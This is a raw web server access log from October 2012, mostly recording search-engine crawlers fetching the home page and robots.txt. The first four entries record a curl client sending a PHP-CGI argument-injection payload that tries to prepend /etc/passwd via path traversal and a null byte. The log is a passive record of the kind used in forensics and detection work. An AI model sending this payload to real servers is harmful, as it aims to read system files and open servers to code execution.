223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
178.154.179.250 - - [19/Oct/2012:00:10:17 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [19/Oct/2012:00:20:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.77.126.55 - - [19/Oct/2012:03:14:43 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [19/Oct/2012:03:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
95.108.151.244 - - [19/Oct/2012:05:29:21 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:22 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:24 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:24 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.151.244 - - [19/Oct/2012:05:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
